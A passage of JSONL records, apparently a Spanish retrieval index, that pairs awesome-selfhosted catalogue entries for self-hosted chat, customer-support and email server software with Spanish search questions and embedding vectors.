0.00566, -0.00355, 0.00669, -0.02984, 0.00834, 0.04938, -0.05177, 0.07335, -0.00726, -0.01164, -0.10327, -0.00555, -0.09771, -0.0607, -0.03209, 0.01047, 0.0487, 0.02334, 0.04671, -0.03964]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "que plataforma de mensajerΓ­a instantΓ‘nea alternativa a WhatsApp existe?", "v": [0.1006, 0.11875, -0.06126, -0.0847, -0.09149, -0.03863, -0.03499, -0.11154, -0.08034, -0.01128, -0.01054, -0.14212, 0.02577, 0.13192, -0.04916, 0.15911, 0.08902, 0.07179, 0.09606, -0.0856, 0.03515, -0.04147, -0.14708, -0.11051, -0.09399, 0.00312, -0.05224, -0.00076, -0.05088, 0.00271, 0.03444, -0.10056, 0.06962, 0.05276, -0.08099, 0.04576, 0.05467, 0.03779, 0.03305, 0.02616, 0.08899, 0.05942, 0.01219, 0.05132, 0.00524, 0.04606, -0.04029, -0.00341, 0.06207, 0.06115, -0.01137, -0.00636, -0.06358, 0.12448, -0.00461, 0.01994, 0.30542, -0.09597, 0.04665, -0.00434, -0.02906, 0.11648, -0.01805, 0.00226, 0.05415, 0.08116, -0.03194, 0.0199, -0.11822, 0.13344, 0.09698, -0.00089, 0.018, 0.0562, -0.01848, 0.05843, -0.18549, 0.09741, -0.12848, 0.08013, 0.09175, -0.02716, 0.0947, 0.00615, -0.00333, -0.09647, -0.00497, -0.04609, 0.03162, -0.0356, 0.03027, 0.03541, 0.02017, 0.11113, 0.04902, -0.11009, -0.06979, -0.10923, -0.03511, 0.02039, 0.01099, -0.0464, -0.05132, -0.00479, -0.02362, -0.0278, -0.03684, -0.02768, -0.00568, 0.024, 0.05558, 0.00429, 0.08486, 0.0614, 0.0293, -0.09146, 0.01762, 0.01533, 0.02618, -0.03931, -0.02932, 0.05482, 0.03755, -0.03414, 0.06522, 0.1165, -0.05895, 0.04582, -0.00447, 0.06771, 0.02253, -0.14829, -0.03653, -0.06821, -0.05616, 0.01052, 0.01805, 0.04561, 0.08152, 0.0024, 0.01503, -0.01634, -0.00747, -0.13843, -0.00094, 0.02122, -0.0237, -0.14346, -0.03182, 0.07925, 0.00175, -0.00281, -0.15407, 0.04177, -0.01891, -0.06964, -0.02006, -0.00676, -0.09831, 0.10061, -0.01787, -0.06348, -0.0149, 0.07873, -0.02359, -0.04583, 0.08614, 0.03927, -0.02992, -0.01438, 0.01804, 0.06267, 0.09962, -0.09653, -0.01638, 0.04572, 0.02466, 0.0149, 0.00793, -0.08353, -0.00268, -0.01958, 0.0592, -0.01129, 0.05541, 0.01742, -0.0603, 0.02979, -0.02091, 0.09942, -0.03695, 0.02871, -0.05847, -0.00647, 0.00722, 0.00625, -0.06816, -0.04444, 0.04273, -0.0042, -0.02853, -0.01278, 0.01923, 0.01026, -0.07147, -0.02352, -0.00894, -0.03502, -0.00702, -0.03047, -0.04296, 0.00636, 0.01417, 0.00872, 0.00058, 0.01809, 0.06578, -0.05769, 0.02405, -0.01472, -0.04391, -0.00146, -0.0214, 0.02342, -0.00511, 0.0993, -0.03778, 0.02562, -0.00927, 0.00925, 0.03792, -0.00614, -0.01537, 0.01032, 0.05075, -0.11109, 0.02232, -0.02873, -0.02235, -0.02352, -0.02997, -0.02354, 0.03275, 0.09558, -0.0324, 0.03924, -0.05349, -0.01043, -0.06035, -0.01081, 0.00345, -0.03199, 0.04611, 0.02089, 0.01738, -0.01317]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "con quΓ© programa puedo gestionar el soporte al cliente de forma omnicanal desde WhatsApp?", "v": [-0.15241, 0.07184, -0.06229, -0.1904, -0.07601, -0.07162, -0.0079, -0.08838, -0.13854, -0.0596, -0.06968, -0.18552, 0.05585, 0.01557, -0.1075, 0.11683, 0.07268, -0.13319, 0.04684, 0.14005, 0.06676, -0.03849, -0.0458, -0.11537, -0.09282, 0.04454, 0.06273, -0.01857, -0.05667, 0.01408, 0.06992, -0.14983, -0.05279, -0.02917, 0.04474, 0.14297, -0.02732, -0.00132, 0.04481, 0.07075, -0.02573, -0.06234, 0.02429, 0.03612, 0.12481, 0.01462, 0.05021, -0.07715, 0.06724, -0.00949, -0.02911, -0.08742, -0.00894, 0.01041, 0.01448, -0.05662, 0.16315, -0.17871, 0.04281, 0.04793, 0.01908, 0.14326, -0.03552, 0.11898, 0.13778, -0.01, 0.05433, 0.00652, -0.06881, 0.09268, -0.03238, 0.0441, 0.00434, 0.01092, 0.07345, -0.00652, -0.0608, 0.09753, 0.00042, -0.07499, 0.02241, 0.13164, 0.09205, 0.02632, -0.02803, 0.02583, -0.01915, 0.01109, -0.0321, -0.05917, -0.00652, 0.00383, -0.02833, 0.03239, 0.00457, -0.08206, 0.00528, -0.05713, -0.0397, 0.01734, -0.01469, -0.0793, -0.0921, 0.0402, -0.02463, 0.04953, 0.06795, -0.09345, -0.06633, 0.04856, -0.05859, 0.04494, -0.04185, 0.06321, -0.02778, -0.02491, 0.05801, -0.00258, 0.06648, -0.04973, -0.00604, 0.04025, 0.02292, 0.0254, 0.11093, 0.07215, 0.00238, 0.16373, -0.03914, 0.03147, -0.0463, -0.002, -0.01563, -0.00941, -0.03165, 0.00056, -0.01243, 0.0816, -0.00822, -0.0349, -0.0191, 0.01545, 0.02141, -0.06852, 0.0877, -0.07875, 0.04465, -0.11575, -0.01113, 0.06047, 0.07533, 0.00392, -0.08037, 0.04828, -0.08306, -0.04577, 0.01189, -0.05217, -0.03311, 0.08034, -0.02572, 0.00484, -0.02784, 0.03571, 0.04789, -0.07407, 0.04014, -0.00251, 0.07825, 0.04643, -0.02002, 0.04365, 0.07261, -0.08024, -0.0187, -0.01873, -0.01207, -0.06066, 0.06306, -0.06395, -0.05428, 0.01548, 0.10901, 0.01992, -0.02872, -0.00414, -0.14026, 0.08918, -0.03781, 0.01476, -0.03926, 0.06748, -0.0606, -0.04384, 0.01468, -0.02636, -0.07036, 0.02713, 0.00747, -0.00699, -0.0636, -0.01954, 0.04961, 0.02115, 0.00855, 0.07502, -0.01753, 0.029, 0.08765, 0.05122, -0.03958, -0.02272, 0.02749, 0.04304, -0.04335, -0.02035, -0.02005, 0.03146, 0.07499, 0.03434, -0.03177, -0.00548, 0.07061, 0.03696, 0.01513, -0.00857, -0.00352, 0.02874, -0.033, 0.04839, 0.03864, -0.05532, -0.01519, -0.00571, 0.05553, -0.07389, 0.0613, -0.07787, -0.03444, -0.03552, -0.01127, 0.05988, 0.02364, 0.02244, -0.04408, 0.0206, -0.13067, 0.06058, -0.04467, 0.01672, -0.01437, 0.03415, 0.02678, -0.0397, 0.0357, -0.00223]} -{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Tiledesk β€” All-in-one customer engagement platform from lead-gen to post-sales, from WhatsApp to your website. With omni-channel live agents and AI-powered chatbots (alternative to Intercom, Zendesk, Tawk.to and Tidio) [MIT, Docker/K8S]. Tinode β€” Instant messaging platform. Backend in Go. Clients: Swift iOS, Java Android, JS webapp, scriptable command line; chatbots [GPL-3.0, Go]. Tox β€” Distributed, secure messenger with audio and video chat capabilities [GPL-3.0, C]. Tuwunel β€” High-performance and feature-rich chat server for Matrix, and the successor to conduwuit (fork of Conduit) [Apache-2.0, deb/Docker/Nix/Rust]. Typebot β€” Conversational app builder (alternative to Typeform and Landbot) [AGPL-3.0, Docker]. WBO β€” Web Whiteboard to collaborate in real-time on schemas, drawings, and notes [AGPL-3.0, Nodejs/Docker]. Zulip β€” Zulip is a powerful, open source group chat application [Apache-2.0, Python].", "indexar": "cual es una herramienta para crear aplicaciones de chat conversacional sin programar?", "v": [-0.01607, 0.0967, -0.03786, -0.219, 0.01975, -0.22513, 0.00087, -0.04568, -0.05967, -0.03103, -0.11398, -0.08683, -0.07614, -0.02907, -0.00557, 0.07538, 0.08481, -0.04978, 0.03815, 0.04378, 0.02872, 0.08951, -0.06382, -0.06496, -0.1369, -0.00132, 0.06915, -0.02436, -0.08527, 0.10038, -0.00114, 0.01173, 0.12774, -0.06088, -0.05749, -0.07102, 0.01093, -0.00522, -0.03892, 0.0887, -0.02034, 0.10631, -0.05857, 0.08614, 0.06657, 0.02983, 0.06138, -0.0329, -0.01646, 0.04777, -0.07338, -0.06619, -0.05099, 0.07815, 0.0883, -0.08156, 0.18512, -0.16816, 0.08723, -0.10352, -0.08702, 0.05252, -0.00715, -0.01824, 0.0254, -0.03896, 0.02863, -0.00144, -0.09886, 0.12332, -0.01445, 0.0819, -0.02814, 0.03249, 0.12198, 0.07768, -0.08699, 0.01649, -0.00888, -0.01347, 0.00144, -0.07871, -0.02408, 0.06209, -0.07442, -0.08454, 0.10453, 0.04253, -0.00181, -0.01866, -0.01704, 0.06835, -0.02561, 0.01504, 0.09794, -0.06189, 0.1369, 0.01908, 0.04199, 0.08167, 0.10464, -0.11108, -0.12791, 0.03246, -0.11628, 0.02105, 0.02648, -0.0758, -0.02625, -0.01618, 0.09317, -0.03877, 0.02351, 0.02054, -0.017, -0.01549, 0.01433, -0.06864, 0.02076, -0.07012, -0.01749, 0.06898, -0.06551, -0.03198, -0.01759, 0.00564, -0.0425, 0.11904, -0.05575, 0.057, 0.0303, -0.07384, -0.08386, -0.08019, -0.05297, 0.04798, 0.09178, -0.02434, 0.03443, -0.06925, 0.00076, 0.06257, -0.00706, -0.04749, 0.08239, 0.06817, 0.00348, -0.07274, -0.00419, 0.0303, 0.08911, 0.00084, 0.03616, 0.08082, -0.11751, -0.01779, -0.051, -0.04058, -0.06778, 0.0477, -0.04924, -0.02798, -0.01165, -0.07372, 0.03566, -0.10199, 0.00522, 0.04913, 0.07723, 0.05346, 0.0328, 0.0101, 0.10483, -0.05641, 0.00754, -0.0139, -0.00478, -0.04494, -0.06091, -0.14235, -0.09778, -0.04033, -0.01463, -0.07968, -0.01589, -0.06006, -0.015, -0.00788, -0.00723, 0.02312, -0.03788, 0.08078, 0.00489, -0.04278, -0.00663, -0.03236, 0.00669, -0.07288, -0.00265, -0.03274, -0.03785, 0.0207, -0.01151, -0.00753, 0.03658, 0.07849, -0.02582, -0.00465, -0.01597, 0.06226, 0.04593, 0.00713, 0.01557, 0.07521, -0.00083, -0.05626, 0.01626, 0.02699, 0.01476, 0.01112, 0.02762, -0.01578, 0.03814, 0.01183, 0.00355, 0.02311, 0.0083, 0.06896, -0.01055, -7e-05, -0.01231, -0.0686, 0.01791, -0.05702, 0.0342, 0.00113, 0.03799, -0.03202, -0.0514, -0.07678, -0.00826, 0.07594, 0.0055, -0.04107, -0.03862, -0.04495, -0.05056, 0.02335, -0.06355, -0.06405, -0.00766, 0.07812, 0.09047, -0.063, 0.02591, 0.00177]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "que programa hay para montar un servidor de email completo en Docker?", "v": [-0.01727, -0.00498, -0.10816, -0.13575, -0.16118, -0.11702, 0.08074, -0.00497, -0.06459, -0.1235, -0.09049, -0.05915, 0.12089, -0.18859, 0.01513, -0.00935, 0.21583, -0.16099, 0.09317, 0.0868, 0.02583, 0.06938, 0.0142, -0.09211, -0.06401, 0.08476, -0.05113, -0.04406, -0.03419, 0.03467, 0.12684, -0.02233, 0.00612, -0.03477, 0.08616, -0.0703, 0.09478, 0.03641, -0.02617, 0.0355, 0.07207, 0.01223, -0.06174, 0.03795, -0.00511, 0.00139, 0.13634, -0.08932, 0.09869, -0.0539, 0.02304, 0.03662, -0.05038, -0.00861, -0.00278, 0.01688, 0.00655, -0.17752, 0.10458, -0.03371, -0.04927, 0.07929, -0.01267, -0.00563, 0.03465, -0.01205, 0.04423, -0.0476, -0.11822, -0.00531, -0.02723, -0.03303, 0.0024, -0.02704, -0.02572, 0.03686, -0.00169, 0.00206, 0.00782, 0.04257, 0.00546, -0.01615, 0.0006, 0.19468, -0.09676, -0.04438, 0.05569, -0.10334, 0.01398, 0.01061, 0.095, 0.16522, -0.05118, 0.13761, 0.03638, -0.1494, 0.13418, 0.00265, -0.02151, 0.06203, 0.0652, 0.02555, 0.00641, 0.13866, -0.02444, 0.0804, 0.1089, -0.03885, 0.09075, 0.04591, -0.05651, -0.02172, -0.07173, -0.00987, -0.12665, -0.133, 0.0029, -0.00819, 0.05396, 0.00481, -0.07112, 0.10958, -0.01627, 0.05398, 0.08586, -0.06284, 0.07801, 0.0827, -0.01953, 0.04821, 0.00042, -0.04209, -0.06443, -0.02634, -0.04583, 0.02573, 0.00168, -0.05043, -0.06242, -0.06412, -0.01764, 0.01568, 0.03559, 0.01219, 0.07895, 0.03601, 0.07575, -0.09669, -0.04594, 0.0733, 0.08001, 0.08214, -0.00422, -0.02572, -0.11745, -0.08226, 0.04737, -0.03652, 0.01638, 0.09037, -0.00145, 0.04266, 0.02784, 0.0108, 0.03536, -0.05318, 0.01751, 0.01493, 0.01376, 0.04405, -0.0411, 0.04184, 0.04474, -0.0299, -0.04952, 0.01565, 0.01127, -0.04083, -0.00027, 0.03465, -0.04039, -0.00526, 0.0756, 0.05782, -0.07449, -0.04356, -0.00023, -0.01103, -0.00445, 0.01845, -0.00998, 0.0259, -0.0274, 0.05532, 0.04626, -0.04445, -0.03559, -0.01518, 0.01667, -0.03249, -0.05436, -0.05032, -0.04283, 0.04443, -0.049, 0.0481, -0.04333, 0.02536, 0.02059, 0.09216, -0.02773, -0.03872, 0.03557, -0.02543, -0.03404, 0.00638, 0.08153, 0.01276, 0.03632, 0.04129, -0.00409, -0.00543, 0.0265, 0.03944, -0.01443, -0.02082, 0.01782, 0.04202, 0.04089, 0.02816, -0.01461, -0.01765, -0.03147, -0.01998, -0.00567, -0.00809, 0.03724, -0.03958, -0.02951, -0.08229, 0.00221, 0.08087, 0.01657, -0.05881, -0.02781, -0.00903, -0.03516, 0.00025, -0.04107, -0.00185, -0.03273, -0.01314, -0.03862, -0.04477, 0.00809, -0.00806]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "con que puedo crear mΓΊltiples alias de correo desde una misma cuenta?", "v": [-0.04637, 0.1976, -0.14195, 0.02213, -0.10032, 0.0008, -0.0333, 0.04655, -0.24638, -0.11678, -0.02572, -0.09508, 0.12775, -0.09647, 0.17436, -0.05514, 0.0354, -0.03401, 0.05908, 0.02163, 0.05365, -0.10805, -0.03793, 0.01892, -0.11102, 0.04092, 0.07392, -0.01696, -0.01087, 0.01945, -0.03478, -0.00277, -0.00092, -0.10513, 0.10119, -0.063, -0.02677, 0.10464, -0.03166, 0.04812, 0.03964, 0.0575, -0.1537, 0.12285, -0.04581, 0.01685, -0.06399, 0.06365, -0.04023, 0.02136, -0.03282, -0.08615, -0.19026, 0.05241, 0.02844, -0.00754, 0.14383, -0.13043, -0.09432, 0.00344, -0.03617, 0.03913, 0.01607, 0.06612, -0.10189, -0.05537, -0.0053, -0.05645, -0.07941, 0.01772, -0.01151, -0.01803, -0.05169, -0.03012, 0.03226, 0.05119, -0.01545, -0.07524, -0.00479, 0.03464, -0.04175, -0.10713, -0.03765, -0.05451, -0.02063, -0.08537, 0.00805, -0.03614, 0.0149, -0.07247, 0.05252, -0.06052, -0.08857, 0.04812, 0.00505, 0.03235, 0.02408, -0.0062, -0.10795, 0.04983, -0.00473, 0.06717, -0.09915, 0.12235, 0.0125, 0.06197, 0.04364, -0.04027, 0.03164, -0.01058, -0.00328, -0.01417, -0.00802, -0.07963, -0.0329, -0.01054, -0.07503, -0.0727, 0.09182, 0.01789, -0.01966, -0.03706, -0.02384, 0.04853, 0.03443, -0.06848, -0.08524, 0.00256, 0.05338, 0.08345, -0.02609, 0.01881, -0.04266, -0.04829, -0.00632, 0.00077, 0.01713, -0.06927, -0.02595, -0.08694, 0.04315, 0.09561, 0.04864, -0.14144, 0.0309, -0.01365, -0.0765, -0.14154, -0.08547, 0.01683, -0.01302, -0.03168, 0.03808, 0.04069, -0.12474, 0.05338, -0.01987, -0.06786, 0.03534, 0.08502, -0.05401, 0.09006, 0.00703, 0.07039, -0.03182, -0.05948, -0.05792, -0.04456, 0.04775, 0.02089, -0.0944, 0.05175, 0.06383, -0.05371, 0.02001, -0.05371, 0.02044, -0.0392, -0.00986, -0.03785, -0.02012, 0.00563, -0.06812, -0.04499, -0.04457, -0.08866, 0.04164, 0.00622, 0.0384, 0.04696, -0.05112, 0.05218, -0.03133, -0.01793, -0.06192, -0.03793, 0.01728, -0.05409, 0.00039, -0.07532, -0.01803, 0.04385, -0.02296, -0.033, 0.00771, 0.03575, -0.11135, 0.07333, -0.01221, 0.01562, 0.06, -0.09102, 0.04995, -0.08359, -0.00922, -0.01722, 0.01668, -0.07774, 0.02123, 0.01428, 0.01138, 0.0256, 0.0554, 0.01101, -0.03296, -0.01775, 0.0279, 0.01705, 0.02966, 0.02191, 0.00265, 0.06521, 0.01993, -0.07855, 0.07884, 0.02313, 0.08164, -0.01653, -0.03019, 0.00639, 0.0015, 0.05838, -0.00981, -0.02604, 0.01054, -0.00359, -0.1058, 0.02802, -0.04423, -0.09368, -0.03097, 0.08731, 0.04178, -0.00574, -0.00487, -0.01703]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: AnonAddy β€” Email forwarding service for creating aliases [MIT, PHP/Docker]. b1gMail β€” Complete email solution that runs on any webspace with PHP and MariaDB. It supports POP3 catchall mailboxes and can also integrate with Postfix or b1gMailServer if you're running your own server [GPL-2.0, PHP]. DebOps β€” Your Debian-based data center in a box. A set of general-purpose Ansible roles that can be used to manage Debian or Ubuntu hosts [GPL-3.0, Ansible/Python]. docker-mailserver β€” Production-ready fullstack but simple mail server (SMTP, IMAP, LDAP, Antispam, Antivirus, etc.) running inside a container. Only configuration files, no SQL database [MIT, Docker]. Dovel β€” SMTP server that sends and receives emails according to a simple configuration file, with an optional web interface that you can use to browse your emails [LGPL-3.0, Go]. Inboxen β€” Lets you have an infinite number of unique inboxes [GPL-3.0, Python]. iRedMail β€” Full-featured mail server solution based on Postfix and Dovecot [GPL-3.0, Shell].", "indexar": "cual es la mejor alternativa libre para gestionar correos con interfaz web sencilla?", "v": [0.02349, 0.0902, -0.12519, -0.10413, 0.0035, -0.10269, 0.00391, -0.03879, -0.14499, -0.05313, 0.00333, -0.12955, 0.0475, -0.02237, 0.16039, -0.03627, 0.16162, 0.01065, 0.03575, -0.07177, -0.01213, 0.03334, -0.13813, -0.10716, -0.11125, -0.10029, 0.01993, -0.03275, -0.01103, 0.00842, 0.01885, -0.12631, 0.06043, 0.0208, 0.00672, 0.13769, 0.10955, 0.15991, 0.05617, -0.07942, 0.0513, 0.01882, -0.10548, 0.10343, 0.03585, -0.07442, -0.02991, 0.00081, -0.00169, 0.02774, -0.07497, -0.13923, -0.06689, 0.01108, 0.01415, 0.01811, 0.18575, -0.16812, 0.02311, -0.06878, -0.07112, 0.09768, 0.02409, 0.08433, 0.03159, -0.02087, -0.03571, -0.04093, -0.1136, 0.07693, 0.10257, 0.03916, 0.01126, -0.00036, -0.03636, 0.07527, -0.03147, 0.05345, -0.00761, 0.13005, 0.1334, -0.11603, -0.02911, 0.01154, -0.0359, -0.07281, -0.0132, -0.14436, -0.0753, -0.04328, 0.08516, -0.07256, -0.06692, 0.01041, 0.00339, -0.06412, -0.0922, 0.0561, -0.03056, 0.06149, -0.02952, 0.07646, -0.18924, 0.08936, -0.04494, 0.02855, -0.00103, 0.01191, -0.05223, 0.00535, -0.04341, -0.02558, 0.06222, 0.03179, -0.04904, -0.03293, -0.02742, -0.02486, 0.01394, -0.09131, -0.04558, -0.03718, -0.04024, 0.00892, 0.07466, -0.00346, 0.06226, 0.02657, -0.00342, 0.05875, -0.05237, -0.12967, -0.08168, -0.07849, -0.06456, 0.0056, -0.05565, -0.06359, 0.01166, -0.03876, -0.04543, 0.07421, -0.04076, -0.04558, 0.02706, -0.01219, 0.03348, -0.07424, -0.06809, 0.02018, 0.02704, -0.07839, 0.00113, 0.07671, -0.05613, 0.01989, -0.02885, -0.08151, -0.06195, 0.05037, -0.00422, -0.00447, -0.05086, 0.10565, -0.00946, -0.04807, -0.07677, 0.0893, -0.09208, 0.01463, -0.01201, 0.07637, 0.06571, -0.06171, 0.01067, -0.03502, 0.00603, -0.03142, 0.03277, 0.0008, 0.01016, 0.04923, -0.02342, 0.01019, -0.09196, -0.05082, -0.01857, 0.07346, -0.02477, 0.02091, -0.03559, 0.05673, -0.0475, -0.00594, 0.0495, 0.01925, -0.04041, -0.11251, -0.07555, -0.00554, -0.00731, -0.05297, 0.02284, -0.04879, -0.04725, 0.06117, -0.04511, 0.02553, 0.02462, 0.06751, 0.02169, -0.01822, 0.06949, -0.04199, -0.0496, -0.00936, 0.05034, -0.02929, 0.01217, -0.02893, -0.00677, -0.00304, 0.00359, -0.0392, -0.01128, 0.00121, 0.0071, 0.08066, -0.03272, 0.00798, -0.00548, 0.03052, 0.01377, 0.00601, 0.00969, 0.00123, 0.03976, -0.05587, 0.00694, -0.02879, 0.03682, 0.01391, -0.02355, 0.02267, -0.02839, -0.02514, -0.12315, -0.00736, -0.0829, -0.00174, -0.04218, -0.00488, 0.00071, 0.0679, 0.00968, 0.01767]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "que servidor de correo completo me sirve para instalarlo solo en un servidor Ubuntu?", "v": [-0.04494, 0.03919, -0.2312, -0.166, -0.0813, -0.15133, -0.01127, -0.16009, 0.02676, -0.042, -0.18969, -0.06134, 0.01131, -0.05614, -0.03181, -0.05912, 0.10641, -0.15365, 0.0744, 0.02955, 0.02267, 0.03764, 0.01816, -0.01147, -0.10567, 0.08162, 0.04777, -0.06545, -0.00493, -0.12061, 0.06527, -0.04673, -0.00943, -0.0311, 0.02096, -0.10875, -0.00319, 0.06545, -0.08641, 0.10194, 0.11536, 0.00574, -0.01104, 0.08791, 0.01229, -0.04768, 0.10981, -0.10291, 0.10356, -0.0067, -0.0334, -0.0676, -0.12679, -0.03363, -0.00633, 0.04456, 0.09337, -0.15756, 0.14671, -0.01172, -0.17062, 0.04359, -0.00794, 0.02139, 0.07928, 0.04117, -0.12253, -0.01712, -0.11439, -0.06416, -0.12366, 0.0535, 0.01825, -0.10994, 0.00404, 0.1075, -0.00557, 0.0037, 0.0375, 0.04386, 0.07313, 0.0046, -0.06166, 0.0835, -0.11534, -0.08482, 0.01099, -0.01153, 0.03622, 0.01611, 0.07164, 0.07059, -0.08441, 0.08542, 0.0666, -0.05533, 0.11496, -0.00012, 0.01598, -0.01036, 0.06376, 0.05087, 0.02521, 0.05047, 0.00449, 0.05368, 0.07268, -0.10277, 0.05273, -0.02883, 0.04678, 0.00352, 0.00217, 0.01509, -0.05108, -0.09917, 0.02192, 0.0105, 0.01886, 0.06544, -0.12188, 0.01105, 0.03535, 0.08849, -0.00608, -0.0633, 0.04325, 0.0174, -0.00659, 0.00057, 0.00571, -0.08586, -0.07041, 0.02003, -0.07698, 0.03064, 0.08376, -0.05904, -0.10935, -0.05669, 0.02487, 0.0376, -0.03934, 0.00281, 0.12028, 0.03981, 0.07176, -0.09243, -0.05596, -0.01484, 0.0637, -0.02406, -0.03461, 0.01655, -0.12088, -0.03739, 0.05721, -0.05378, 0.00892, 0.03544, 0.054, 0.01909, 0.03304, 0.0726, -0.01772, -0.01685, -0.03044, 0.03747, 0.06276, 0.05044, -0.05146, 0.04639, 0.01266, -0.02976, 0.01902, -0.03662, -0.03946, -0.04747, -0.00844, 0.0564, -0.03916, 0.05316, 0.01821, -0.00856, -0.04398, -0.0293, -0.00167, -0.01577, -0.01248, 0.02252, 0.04074, 0.02905, -0.07067, 0.0552, 0.01531, -0.02522, -0.04649, -0.04252, -0.06974, -0.02152, -0.05077, -0.01911, -0.05512, 